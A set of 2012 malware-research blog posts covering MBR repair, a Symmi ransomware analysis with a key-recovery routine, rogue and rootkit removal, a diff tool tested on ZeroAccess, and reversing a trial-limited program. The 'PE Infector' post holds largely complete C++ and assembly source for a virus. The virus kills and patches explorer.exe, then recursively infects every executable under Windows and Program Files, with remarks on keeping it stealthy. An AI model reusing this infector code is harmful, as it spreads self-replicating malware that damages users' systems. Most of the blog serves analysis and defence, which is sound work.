Si le MBR est masqué (User != LLx ... KO!) , alors on peut récupérer le MBR original et le fixer de manière automatique. Il suffit de choisir l'index correspondant dans PhysicalDrive, et de cliquer sur MBR RAZ.

Si le MBR a été écrasé, il n'existe pas de copie de sauvegarde. On peut alors restaurer un MBR par défaut, dont le choix est fait dans une liste de système d'exploitation (Windows XP, Vista, Seven). Il suffit de choisir l'index correspondant dans PhysicalDrive, de choisir le système d'exploitation de l’ordinateur et de cliquer sur MBR RAZ.

ROGUEKILLER PE

Depuis peu, RogueKiller est capable de lire les ruches Windows en mode Offline. Cela veut dire que RogueKiller est capable de:

Détecter les clés de registre cachées de l'API (rootkit)
Détecter et supprimer les clés de registre d'un système d'exploitation présent sur un disque externe.
Détecter et supprimer les clés de registre d'un PC lancé depuis un live CD PE (ex: OTLPE)

Concrètement, cela est pratique dans le cas de rootkits masquant/protégant leurs clés de registre, ou lorsqu'un PC est inaccessible en raison d'un malware bloquant toute les actions (ransomwares).

Voici une démonstration du mode PE effectuée sur un PC infecté par le malware Gendarmerie, et lancé depuis un live CD OTLPE:

[Analysis] Win32.Symmi naked - Decryption

2012-10-06T17:19:00.001-07:00

Analysis of Win32.Symmi

Find the key and decrypt the files

Recently on Malekal.com's forum, I came across a challenge.
Some people got infected by a brand new ransomware having the particularity to encrypt documents (based on extension, .jpg, .doc, and so on). Having a dropper, I decided to have a look into it and find a way to decrypt those files (if possible)...

The dropper is detected as Win32.Symmi on Virus Total:
https://www.virustotal.com/file/2aca300b45371b3e01e1ab044798bc6777e11345435713027bc8cae6292dda0f/analysis/

Static analysis - What has changed on files?

After launched the dropper, I looked at the modified files. After a little wait, the infection showed up a window saying lots of documents where compromised. The infection is self restarted by a registry key (RUN).

The process and its RUN key

List of compromised files

Disclaimer claiming to be able to contact Microsoft to recover the files

It looked like the very first 100 bytes where overwritten, with no kind of logical (the null bytes where randomly overwritten). No basic encryption here then. I'll have to go further.

Above : encrypted file - Below : original file

Dropping the Paypload

The dropper uses basic tricks to avoid debugging. It's not packed nor protected, but does massive usage of GetProcAddress to make the routine detection more difficult. I found nothing useful by first looking at the dropper in OllyDbg, so I went to APIMonitor.

What APIMonitor showed is fun :)
The dropper was indeed trying to escape of debugging by also create threads and new processes:

- First, It creates new thread and quit the main thread

- Then, the second thread fires a new process

Let's see this in OllyDB!

After setting a breakpoint into GetProcAddress (kernel32.dll), I found the place where CreateThread was called.

I could then place a breakpoint into the StartAddress (0x00C70000) of the thread to break into it.

In this new Thread, I've done the same to find the place where CreateProcess was called.
It was recreating a new process over the same file! (quite unusual, as we could expect some infinite loop).

In fact, the process is created using the flag CREATE_SUSPENDED (see the "PUSH 4" before the call), and later we will see a WriteProcessMemory, and then a ResumeThread.

The WriteProcessMemory routine is indeed writing a whole new PE at StartAddress (0x400000) of our new process, completely overwriting itself. I've made a dump of this code section, it's a standalone PE (our Payload). We will analyse it right after.

To finish ResumeThread resumes the new process (which is now a brand new one, with nothing in common with our dropper).

The Paypload is detected as Generic (quite bad) in Virus Total :
https://www.virustotal.com/file/8387e5d7e76a3c36708ca50eed438245a5906fa4ed07c6229621b1798a13bced/analysis/

Analysing the Payload

Once the payload dumped, and loaded into OllyDbg, we can have a quick overview by looking into the strings and intermodular calls. And this is indeed our encrypter :)

What is remarkable is the call to the APIs : FindFirstFile, FindNextFile (files enumeration), CreateFile (file opening), and WriteFile (file overwriting).

After loading it into API Monitor, we have a dynamic overview of the scheme of file overwriting. This will be useful to understand where to search for a way to decrypt them. We can see the scheme: SetFileAttributes, CreateFile, ReadFile, and then WriteFile (with 100 bytes)

In OllyDBG, I quickly found where the ReadFile and WriteFile were performed. WriteFile was indeed done on the firsts 100 bytes (0x64), as expected (see API Monitor capture above).

Interesting thing, this malware was doing a Sleep of 180 seconds to evade some sanboxes. For debugging purposes, I nopped this call to avoid waiting for nothing :)

To finish, I found where the file was encrypted, and how. It was a "simple" XOR routine, with a key of -1398550687 (ASCII), on my VM.
I suspected the key to be dynamically build, and not hardcoded.

Key's buffer

XOR routine

Let's find the key!

In my tale to find the key, I ran into the fact that the malware was calling an API called GetVolumeInformation right before the call to the routine to XOR the file. My little finger told me it was important to get the key, so I put a breakpoint on the return buffer of this API.

Indeed, it was important. Once the routine responsible for key's computing found, I saw that the Volume serial number was the only thing able to change the key's content.In the main loop, the "Push EDI" was pushing the volume serial number onto the stack for later use.

The key's routine is displayed above. This is not very clear, but nevermind.

It translated it into C++ code below for being able to restore the files.

main loop for key's computing

First part of key's routine

Second part of key's routine

The keys also needs another parameter to find the first ASCII character (here, a "-"). It's the buffer size (0x64), which is hardcoded in the data section. I'll hardcode myself too next.

Let's restore the files!

I've made a little program able to retrieve the key corresponding to a hard drive (the program must be on the same drive than the file to restore), and apply a XOR with this key on the 100 first bytes of a given file (it does the same as the malware, but as XOR is reversible, it restores the file).

Here's the routine to get the key. It's a basic algorithm, but not trivial to reverse...

void GetKey(char* & key)
{
 DWORD volumeSerial = 0, modifiedSerial = 0;
 DWORD initial = 0, tmp = 0, tmp2 = 0, result = 0;
 DWORD operand = 0x0A;
 TCHAR buff[1024];
 char keytmp[1024];
 int count = 0;
 
 // Volume info
 GetVolumeInformation(L"\\", NULL, 0, &volumeSerial, NULL, NULL, NULL, NULL);
 
 // Modified 
 modifiedSerial = -volumeSerial;

 memset(keytmp, '\0', 1024); 
 initial = modifiedSerial;
 while(initial != 0)
 {
  tmp = initial / operand;
  tmp2 = tmp * operand;
  result = - (tmp2 - initial);
  result += 0x30; //go to ACSII
  initial = tmp;

  keytmp[count] = (char)result;
  count++;
 }

 // Invert buffer, add -
 key = (char*)malloc(count + 1 + 1); //1 for -, 1 for null byte
 memset(key, '\0', count + 1 + 1);

 key[0] = 0x2D; // - char
 for (u_int i = 0 ; i < count ; i++)
 {
  key[count - i] = keytmp[i];
 }
}

The program to restore your files is available here : http://tigzy.geekstogo.com/Tools/SymmiDecrypter.exe

To use it, simply move a file to restore on the program icon, it will trigger the program with its path on parameter, and restore the file. It works also by selecting multiple files at once.

Before restoring the files

After restoring the files

Restored file

[Rogue] Win 8 security System

2012-09-19T01:44:00.001-07:00

Windows 8 security system

How to get rid of Windows 8 security system

This rogue is a bit hard to remove, as it comes with a rootkit protecting his buddy...

We can see the rootkit in a gmer log. It has randomly named driver

---- Services - GMER 1.0.15 ----

Service C:\WINDOWS\System32\Drivers\dc514d8c36b2240e.sys (*** hidden *** )    [BOOT] dc514d8c36b2240e                             <-- ROOTKIT !!!

---- Registry - GMER 1.0.15 ----

Reg      HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@ImagePath     \SystemRoot\System32\Drivers\dc514d8c36b2240e.sys
Reg      HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Group         Boot Bus Extender
Reg      HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@ErrorControl 0
Reg      HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Type          1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Start         0
Reg      HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Tag           1
Reg      HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@DisplayName

---- EOF - GMER 1.0.15 ----

The rootkit register Registry callbacks in the kernel, and returns ERROR_ACCESS_DENIED on every attempt from the API to open its service registry key (HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e). Gmer flags it as hidden due to this error.

Gmer: rootkit registry key

Gmer: rootkit detected at boot

As the rootkit is logged as BOOT, it will start with the system at boot time, and restart the rogue. When the rogue is deleted, the rootkit will reinstall it. By the way, the driver is not hidden.

The only way to remove this dual infection, is to :

Remove the rootkit service key (or at least change its boot flag to "DISABLED"). This can not been done with the APIs.
Reboot. The rootkit will not being restarted
Remove the rogue

You can do this with RogueKiller. You should have this report:
RogueKiller detects the registry key as "locked" and allow to delete it.

RogueKiller V8.0.4 [19/09/2012] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur : tigzy [Droits d'admin]
Mode : Suppression -- Date : 19/09/2012 10:15:54

¤¤¤ Processus malicieux : 0 ¤¤¤

¤¤¤ Entrees de registre : 3 ¤¤¤
[RUN][SUSP PATH] HKCU\[...]\Run : bd396e0f9c1c3794.exe (C:\Documents and Settings\tigzy\Local Settings\Application Data\bd396e0f9c1c3794.exe) -> SUPPRIMÉ
[Services][LOCK] HKLM\[...]\ControlSet001\Services\dc514d8c36b2240e -> SUPPRIMÉ
[Services][LOCK] HKLM\[...]\ControlSet002\Services\dc514d8c36b2240e -> SUPPRIMÉ

...

[Tool] DiffView - Test on ZeroAccess

2012-09-11T06:34:00.002-07:00

DiffView : Test on ZeroAccess

DiffView is a tool able to display the modifications made by a program on the system. You can see which files are modified, which are created. You can also see which registry keys are modified, which values are created and which datas are modified.

This is useful when analyzing a new piece of malware, it permits to have a quick overview over the modifications made in the system to find its nevralgic points and weaknesses.

Here's an example with the latest ZeroAccess (max++) variant, the so-called "Recycle CLSID".

New files/keys/values are in blue, while modified stuff is in green.

The file analysis is quite simple. Choose a reference time (in minutes) and hit the "Scan files" button. The treeview will then display new/modified files within the choosen range.

The registry analysis is a bit more complete. The quick scan is similar to the file analysis: It will show only modified/new keys, but no information about values.

If you want to know which value is modified, the better is to do a quick scan, note the affected keys, restore your VM and then make a backup of the affected keys (tick "Thorough scan", and click "Snap" button) before to launch the dropper. Once the dropper launched, hit "Scan reg". The thorough scan will then compare the backup with the new state, and give a detailed diff view. This scan is much more slower, so use it only on targeted keys, not on the whole registry.

Files analysis

Registry analysis

DiffView is also able to log a report in text format, as seen below.

DiffView 1.0.0.0 (by Tigzy)
********************************

Run : 11/09/2012 08:03:33 [Normal Mode]
Machine : VMXP (1 CPUs) [tigzy : ADMIN]
OS: Microsoft Windows XP Professionnel Service Pack 3 (x86)
Diff Time: 1 mn(s)

~~ File Diff: ~~
ROOT --> C:\\Documents and Settings
ROOT --> C:\\RECYCLER
ROOT --> C:\\WINDOWS

[NEW] C:\Documents and Settings\tigzy\Bureau\DiffView.exe
[MOD] C:\Documents and Settings\tigzy\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[MOD] C:\Documents and Settings\tigzy\NTUSER.DAT.LOG
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\L\00000004.@
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\00000004.@
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\00000008.@
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\000000cb.@
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\80000000.@
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\U\80000032.@
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\@
[NEW] C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\n
[NEW] C:\RECYCLER\S-1-5-21-823518204-842925246-839522115-1003\$848ec4efb4fb6501ab69678738a3a5c6\@
[NEW] C:\RECYCLER\S-1-5-21-823518204-842925246-839522115-1003\$848ec4efb4fb6501ab69678738a3a5c6\n
[NEW] C:\WINDOWS\assembly\GAC\Desktop.ini
[MOD] C:\WINDOWS\system32\config\default.LOG
[MOD] C:\WINDOWS\system32\config\software
[MOD] C:\WINDOWS\system32\config\software.LOG
[MOD] C:\WINDOWS\system32\config\system.LOG
[MOD] C:\WINDOWS\system32\wbem\Logs\wbemess.log
[MOD] C:\WINDOWS\system32\wbem\Repository\$WinMgmt.CFG

[QUICK SCAN]

~~ Reg Diff: ~~
ROOT --> HKEY_CLASSES_ROOT
ROOT --> HKEY_CURRENT_USER
ROOT --> HKEY_LOCAL_MACHINE

[KEY][MOD] HKEY_CLASSES_ROOT\clsid
[KEY][MOD] HKEY_CLASSES_ROOT\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32
[KEY][MOD] HKEY_CLASSES_ROOT\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}
[KEY][MOD] HKEY_CLASSES_ROOT\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
[KEY][MOD] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
[KEY][MOD] HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
[KEY][MOD] HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\TaskManager
[KEY][MOD] HKEY_CURRENT_USER\Software\Classes
[KEY][MOD] HKEY_CURRENT_USER\Software\Classes\clsid
[KEY][MOD] HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}
[KEY][MOD] HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
[KEY][MOD] HKEY_CURRENT_USER\SessionInformation
[KEY][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32

Finished
<C:\Documents and Settings\tigzy\Bureau\DiffView[0].txt>

[THOROUGH SCAN]

~~ Reg Diff: ~~
ROOT --> HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}
ROOT --> HKEY_CLASSES_ROOT\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
ROOT --> HKEY_CURRENT_USER\Software\Classes
ROOT --> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}
ROOT --> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}

[KEY][MOD] HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}
[KEY][MOD] HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32
[VAL][MOD] HKEY_CLASSES_ROOT\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32 : (C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\n.) -> Olddata : (C:\WINDOWS\system32\wbem\fastprox.dll)
[KEY][MOD] HKEY_CLASSES_ROOT\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
[KEY][NEW] HKEY_CLASSES_ROOT\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
[KEY][MOD] HKEY_CURRENT_USER\Software\Classes
[KEY][NEW] HKEY_CURRENT_USER\Software\Classes\clsid
[KEY][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}
[KEY][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32
[VAL][MOD] HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32 : (C:\RECYCLER\S-1-5-18\$848ec4efb4fb6501ab69678738a3a5c6\n.) -> Olddata : (C:\WINDOWS\system32\wbem\fastprox.dll)

DiffView is available for download here : http://tigzy.geekstogo.com/diffview.html

[Analysis] Chronicles of a PE Infector

2012-09-10T08:03:00.001-07:00

Chronicles of a PE Infector

Recently while roaming on forums I came across a basic tutorial on "how to make a PE infector". It was explaining how to modify a PE (.exe or .dll) in order to execute some custom code at its startup (it was a MessageBox "Hello world"). I tried it, and indeed it was easy. So to go further I wanted to implement a true PE infector, able to replicate himself in other files ...

DISCLAIMER!

This is not a "how to" to make a virus. This is a detailed analysis to explain how virus (and especially PE-infectors) works. You cannot use this to propagate virus. These technicals are known for years by malware editors, so this is only to help "good" people to understand how they work. I cannot be responsible for damaged caused by this code on your or someone's computer. You use it at your own risk.

Scheme of attack

Basically, the main idea is to redirect the PE execution flow from the entry point (EP) to an injected section of code (ShellCode). Then, the ShellCode must call the previous entry point (EP). This will allow to execute some code before the PE access its own. Here's a schematic :

Left : before patching - Right : after patching

Infect an executable

Once the routine to infect a PE is done, we can schedule a macro attack over the system. To do this, we will act in 2 times. The first step is to infect an important exe file : explorer.exe. As this file is protected (cause running), we will simply kill its process and infect the file. This will force the process to reload the file (infected this time) and will allow the patching.

Here's the code of the main. We basically get the path of explorer.exe, we kill it, wait half a second (the time for the kill to be done) and we infect it.

int _tmain(int argc, _TCHAR* argv[])
{
 TCHAR win[MAX_PATH] = L"";
 SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); //Windows
 
 wstring Path = wstring(win) + L"\\explorer.exe";
 KillProcessByName(L"explorer.exe");
 Sleep(500);
    InfectPe(Path);
 
 system("PAUSE");
    return 0;
}

Let's see the InfectPE routine, step by step...

In order to compile those functions at the same place as in the source code, you need to remove the incremental linking from the linker options (thanks Shebaw).

Here we simply get address and size of the ShellCode. The size is get by looking at the address of a virtual function called ShellCodeEnd, which is here only to mark the end of the ShellCode (see later)

// Get addresses of shellcode
DWORD start = (DWORD)ShellCode;
DWORD end = (DWORD)ShellCodeEnd;
DWORD stubLength = end - start;

We open the file to infect (explorer.exe) and we map its memory into our process context with READ and WRITE permission. Then we check if it's a PE (portable executable) and we save the current entry point (EP).

// Get addresses of shellcode
// map file
 hFile = CreateFile(Path.c_str(), GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
       
 // Get file size
 fsize = GetFileSize(hFile, 0); 
 
 // Create file mapping -- hFileMap
    hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);
    
 // Create Map -- hMap
    hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);
     
 // check signatures -- must be a PE
    pDosHeader = (PIMAGE_DOS_HEADER)hMap;
    if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) goto cleanup;
    
    pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);
    if(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) goto cleanup;

// Not dll
 if (pNtHeaders->FileHeader.Characteristics & IMAGE_FILE_DLL
  && pNtHeaders->FileHeader.Characteristics & IMAGE_FILE_EXECUTABLE_IMAGE) goto cleanup;
 
    // get last section's header...
    pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
    pSection = pSectionHeader;
 pSection += (pNtHeaders->FileHeader.NumberOfSections - 1);
    
 // save entrypoint
 oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;
    oep += (pSectionHeader->PointerToRawData) - (pSectionHeader->VirtualAddress);

Now we are looking for a free space to put our shellcode, based on the shellcode size. We just looking for a large enough place with bytes set to 0x0.

// Get addresses of shellcode
//******************************************************
 // locate free space - code cave to write the shellcode 
 //******************************************************
 for(i = pSection->PointerToRawData ; i != fsize ; i++)
 {
  if((char*)hMap[i] == 0x00)
  {
   if(charcounter++ == stubLength + 24)
   {
    printf("[+] Code cave located @ 0x%08lX\n", i);
    writeOffset = i;
   }
  }
  else charcounter = 0;
 }
    if(charcounter == 0 || writeOffset == 0)
 {
        printf("[-] Could not locate a big enough code cave\n");
        goto cleanup;
    }
    
 // decrement to rewind to the beg of the code cave
 writeOffset -= stubLength;
    
 // Allocate memory
    stub = (unsigned char *)malloc(stubLength + 1);
    if(!stub) goto cleanup;
    
 // copy stub into a buffer
 memcpy(stub, ShellCode, stubLength);

Then we fill the place holders of the Shellcode. By looking at the ShellCode's code (see below), you will see addresses initialized with 0xCCCCCCCC. This is a mean to quickly find the datas we need to replace. Here we have 2 thing to replace.

The address of the LoadLibrary function
The initial Entry Point

// locate offsets of place holders in code
 for(i = 0, charcounter = 0; i != stubLength; i++)
 {
        if(stub[i] == 0xCC)
  {
            charcounter++;
   if(charcounter == 4 && callOffset == 0)   // First is call 
    callOffset = i - 3;
   else if(charcounter == 4 && oepOffset == 0)  // Second is OEP
    oepOffset = i - 3;
  }
  else charcounter = 0;
 }
 
 // check they're valid
 if(oepOffset == 0 || callOffset == 0)
 {
  free(stub);
  goto cleanup;
 }
 
 //******************************************************
 // Load Kernel32.dll to get LoadLibrary address
 //******************************************************
 hKernel32 = LoadLibrary(L"Kernel32.dll");
 if(!hKernel32)
 {
  free(stub);
  printf("[-] Could not load Kernel32.dll");
  goto cleanup;
 }
 
 // fill in place holders
 *(u_long *)(stub + oepOffset) = (oepRva + pNtHeaders->OptionalHeader.ImageBase);
 *(u_long *)(stub + callOffset) = ((DWORD)GetProcAddress(hKernel32, "LoadLibraryA"));
 FreeLibrary(hKernel32);

Finally, our ShellCode is ready. We simply write it into the code cave we found, and we erase the original entry point with the address of the beginning of our ShellCode.

// write stub
 memcpy((PBYTE)hMap + writeOffset, stub, stubLength);
 
 // rewrite entrypoint to point on shellcode
 pNtHeaders->OptionalHeader.AddressOfEntryPoint = FileToVA(writeOffset, pNtHeaders) - pNtHeaders->OptionalHeader.ImageBase;
 
 // set section size
 pSection->Misc.VirtualSize += stubLength;
 pSection->Characteristics |= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;
 
 // cleanup
 printf("[+] Stub written!!\n[*] Cleaning up\n");
 free(stub);
 
cleanup:

 // Write memory map back
 FlushViewOfFile(hMap, 0);
    UnmapViewOfFile(hMap);
    
    SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);
    SetEndOfFile(hFile);
    CloseHandle(hFileMap);
    CloseHandle(hFile);

Let's see this famous ShellCode... This a very basic trick. We call LoadLibray with the complete path of our injected DLL. This DLL will contain all the code we want to execute in the process's context.

__declspec(naked) void ShellCode()
{
 __asm
 {
  pushad       // preserve our thread context
  call GetBasePointer
  GetBasePointer: 
  pop ebp
  sub ebp, offset GetBasePointer // delta offset trick.
  
  lea  eax, [ebp+szPath]   // Path param
  push eax
  mov  eax, 0xCCCCCCCC   // pattern to fill with GetProcAddr("LoadLibrary")
  call eax
 
  popad       // restore our thread context
  push 0xCCCCCCCC     // push address of orignal entrypoint
  retn       // retn used as jmp
  
  szPath:       // C:\\windows\\system32\\pe.dll
   bb('C') bb(':') bb('\\') bb('w') bb('i') bb('n') bb('d') bb('o') bb('w') bb('s') bb('\\')
   bb('s') bb('y') bb('s') bb('t') bb('e') bb('m') bb('3') bb('2') bb('\\') bb('p') bb('e') 
   bb('.') bb('d') bb('l') bb('l') bb(0)      
 }
}
// Here to mark the end of the shellcode
__declspec(naked) void ShellCodeEnd()
{

}

Here's what we've got at the execution :

Explorer.exe patching by the infector.exe

A code cave has been found, and explorer.exe is infected. At its startup, it will execute our ShellCode and load the pe.dll library (that we copied into the good directory!)

Explorer.exe is injected with pe.dll

Infect all executables

Don't stop here :). At this moment, explorer.exe is able to load our DLL at each startup. As Windows needs to start this program each time the system starts, we know our code will be executed. By the way, having a thread into explorer.exe is one of the finest thing for an attacker because inconspicuous.

Now, we will see how this DLL can be used to infect all executables and execute some custom code (depending on what you want). See this schematic:

Let's see the DLL's code. We simply Output a string at process attach (when the process loads the DLL) and we fire a new Thread to infect all PE.

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
      )
{
 DWORD ret = 0;

 switch (ul_reason_for_call)
 {
  case DLL_PROCESS_ATTACH:
   OutputDebugString(L"I'm injected you know!");

   // Create Thread
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &ret);
   break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
   break;
 }
 return TRUE;
}

The thread will iterate directories to find any .exe and patch it. We start at 2 strategic root directories : windir and programfiles. We also create a mutex on this thread because we don't need each infected process to fire a mass infection over the system. With only one thread, it's sufficient and stealthiest.

void InfectAllPe()
{
 HANDLE hMutex;
 TCHAR win[MAX_PATH] = L"", progs[MAX_PATH] = L"";

 // Create mutex
 if (!CreateNamedMutex(L"peinfector", &hMutex))
  return;

 // Get %windir% and %progfiles%
 SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); //Windows
 SHGetFolderPath(NULL,CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, progs); //Program Files

 InfectDirectory(win);
 InfectDirectory(progs);

 // Release mutex
 ReleaseMutex(hMutex); 
}

The InfectDirectory function will iterate recursively files and subdirectories, triggering the InfectPE function for each file (this is the same function as before). I've added a Sleep to relax CPU as this task can be long. The quietest we are, the best it is.

void InfectDirectory(wstring path)
{
 WIN32_FIND_DATA ffd;
    HANDLE hFind = INVALID_HANDLE_VALUE;

 // Build search dir
 wstring pathDir = path + L"\\*";

    // Find the first file in the directory.
 hFind = FindFirstFile(pathDir.c_str(), &ffd);

 // No files
    if (INVALID_HANDLE_VALUE == hFind) return;

 // Loop
    do
    { 
  if (!_tcsicmp(ffd.cFileName, L".") || !_tcsicmp(ffd.cFileName, L".."))
   continue;

  // Directories
  else if ((ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
  {
   // get full path of directory
   pathDir = path + L"\\" + wstring(ffd.cFileName);

   // Iterate inside
   InfectDirectory(pathDir);
  }

  // Files
  else if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
  {
   // get full path of file
   pathDir = path + L"\\" + wstring(ffd.cFileName);
   
   // Infect file
   InfectPe(pathDir);
  }

  // To not occupy all CPU
  Sleep(50);

    }// fin do
    while (FindNextFile(hFind, &ffd) != 0);
    FindClose(hFind);
}

Here's what we've got once Explorer has loaded the DLL :

File infection

And after several minutes:


File infection

Conclusion

At this time, every .exe under Windir and Program File is infected to load our dll at startup.
Our DLL does nothing else than infecting other files. But we can simply add a Thread after our infection routine to execute some custom code with process's privileges.

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
      )
{
 DWORD ret = 0;

 switch (ul_reason_for_call)
 {
  case DLL_PROCESS_ATTACH:
   OutputDebugString(L"I'm injected you know!");

   // Create Thread
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &ret);
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CustomRoutine, 0, 0, &ret);
   break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
   break;
 }
 return TRUE;
}

No suspicious process, only a DLL thread executed by a legit process (explorer.exe)
No suspicious autostart entry (RUN, task, file in the startup folder, ...), only an entry point hijack into an essential system file.

This make the infection stealthier, and harder to detect. However, a simple HASH check will reveal a problem into some system files.

NOTE: All has come from a thread on Rohitab.com. See the link below.
Code is from KOrUPt. Thanks to him!

NOTE 2: I do not provide any full source or binary, because I don't want script kiddies to copy/paste it and/or use it to put some badness over the internet. Those who can understand and compile this code are smart enough to know what is bad and what is not.

[Analysis] APIMonitor is handy!

2012-08-22T05:06:00.003-07:00

APIMonitor (rohitab) is handy!

Here's a little analysis showing up how to combine classic tools such as Ollydbg with high level tools like APIMonitor. This helps to have a quick overview on the program / malware to reverse...

While reversing some crackme of the "Lena151 tutorial about reversing", I realised I could drastically simplify the thing by making a "call overview" with APIMonitor. The program I had to reverse was an old program (I cannot tell the name here) with limited-in-time demo version.

First Idea : Have a look with APIMonitor

I suspected the program to get datas of remaining time either in the registry or in a file. So with APIMonitor, I decided to monitor APIs in "File management" and "Registry".

Then I started to monitor. After a bit of filtering / thinking and testing, I found the program was indeed registering remaining time in the registry, at key : HKLM/Software/Win16.2/Level : 0. The fact of removing the key was resetting the remaining time. A good thing, but not enough! Here's a capture of APIMonitor, with some lightning.

The interesting API call is highlighted, RegQueryValueExA.
The same call occurs just above, but only to get size of datas (some skills in API programming is required to understand this...). We can see every parameters, with their state before and after the call. on the right side you can see the state of the data buffer after the call, containing the interesting datas.

The most interesting thing is in the call stack, we can get the address of the call inside the program! This will be really helpful to begin our analysis with OllyDBG. Let's fire Olly at address 0x488B7D.

Second part : Take over with OllyDBG

We fire Olly, and we place a breakpoint at the address above. At startup, we break into it. Good. Let's see what we have here.

We can see the API (RegQueryValueA), and we have all parameters passed in reverse order (first is last). See the comments to know which one is what.

Let's have a look into the registers

I let you associate the register's values with parameters pushed on the stack before the API call...

After the call, here's the content of the buffer (You can compare with APIMonitor's value, it begins with 0x27 0x0E)

The next step is to define a breakpoint on memory access over this buffer (take the first byte), in order to break where the check will be made. We don't know if it's relevant yet, but it can be (reversing is always made of guesses and surprises...)

After done this, we break into the "check routine" (notice the big loop made of several jumps and calls)

What is needed now, is to decrypt how this check is done, and patch the program (or better, find a way to bypass the checks without patching) to have unlimited access to it. But this is not a tutorial on how to crack a software :)

Conclusion

I will not go further this time, as the main goal was more to show how to combine "high level" tools with classic reverse analysis, in order to earn a fantastic amount of time.

